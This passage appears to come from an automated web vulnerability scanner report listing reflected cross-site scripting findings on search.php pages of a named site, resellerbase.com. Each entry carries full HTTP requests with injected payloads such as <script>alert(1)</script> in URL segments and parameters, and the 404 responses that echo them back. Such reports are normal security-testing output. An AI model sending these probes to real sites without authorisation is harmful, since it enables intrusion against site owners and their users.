<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images54dc6<script>alert(1)</script>a76dea6d432/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3618. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8c309<script>alert(1)</script>09158c704bc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/search.php8c309<script>alert(1)</script>09158c704bc?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/search.php8c309<script>alert(1)</script>09158c704bc?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3619. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 45ab7<a>032556a199e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search45ab7<a>032556a199e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search45ab7<a>032556a199e&opt=2 was not found on this server.</p>
...[SNIP]...

2.3620. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 809ac<a>bfe575c0d32 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/images/search.php?keyword=search...809ac<a>bfe575c0d32&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/search.php?keyword=search...809ac<a>bfe575c0d32&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3621. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 85e3b<script>alert(1)</script>4b718a5fd79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&85e3b<script>alert(1)</script>4b718a5fd79=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&85e3b<script>alert(1)</script>4b718a5fd79=1 was not found on this server.</p>
...[SNIP]...

2.3622. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload cda77<a>5c9383b8238 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2cda77<a>5c9383b8238 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2cda77<a>5c9383b8238 was not found on this server.</p>
...[SNIP]...

2.3623. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b7e84<script>alert(1)</script>7d5827e71e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb7e84<script>alert(1)</script>7d5827e71e7/7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb7e84<script>alert(1)</script>7d5827e71e7/7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3624. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9cea5<script>alert(1)</script>148242dac8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/79cea5<script>alert(1)</script>148242dac8a/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/79cea5<script>alert(1)</script>148242dac8a/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3625. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 81439<script>alert(1)</script>fbfb712b4f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes81439<script>alert(1)</script>fbfb712b4f0/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes81439<script>alert(1)</script>fbfb712b4f0/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3626. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload db599<script>alert(1)</script>7689ebe4521 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmosdb599<script>alert(1)</script>7689ebe4521/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmosdb599<script>alert(1)</script>7689ebe4521/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3627. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 11d4f<script>alert(1)</script>fe4da56da58 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/search.php11d4f<script>alert(1)</script>fe4da56da58?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/search.php11d4f<script>alert(1)</script>fe4da56da58?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3628. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload db176<a>e1052aa3fd9 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/search.php?keyword=search...&Submit3=Searchdb176<a>e1052aa3fd9&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/search.php?keyword=search...&Submit3=Searchdb176<a>e1052aa3fd9&opt=2 was not found on this server.</p>
...[SNIP]...

2.3629. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload afee3<a>d39999c4632 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/search.php?keyword=search...afee3<a>d39999c4632&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/search.php?keyword=search...afee3<a>d39999c4632&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3630. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b10ae<script>alert(1)</script>d3136c3e7f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&b10ae<script>alert(1)</script>d3136c3e7f0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&b10ae<script>alert(1)</script>d3136c3e7f0=1 was not found on this server.</p>
...[SNIP]...

2.3631. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4e31a<a>969cf8f6067 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=24e31a<a>969cf8f6067 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=24e31a<a>969cf8f6067 was not found on this server.</p>
...[SNIP]...

2.3632. http://www.resellerbase.com/detail/7/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5188b<script>alert(1)</script>641ca5fbd6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5188b<script>alert(1)</script>641ca5fbd6d/7/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5188b<script>alert(1)</script>641ca5fbd6d/7/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3633. http://www.resellerbase.com/detail/7/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 32639<script>alert(1)</script>82ff56efc61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/732639<script>alert(1)</script>82ff56efc61/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/732639<script>alert(1)</script>82ff56efc61/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3634. http://www.resellerbase.com/detail/7/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5938f<script>alert(1)</script>92fdd4f2dce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes5938f<script>alert(1)</script>92fdd4f2dce/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes5938f<script>alert(1)</script>92fdd4f2dce/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3635. http://www.resellerbase.com/detail/7/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7a83d<script>alert(1)</script>865fa517da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/search.php7a83d<script>alert(1)</script>865fa517da?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

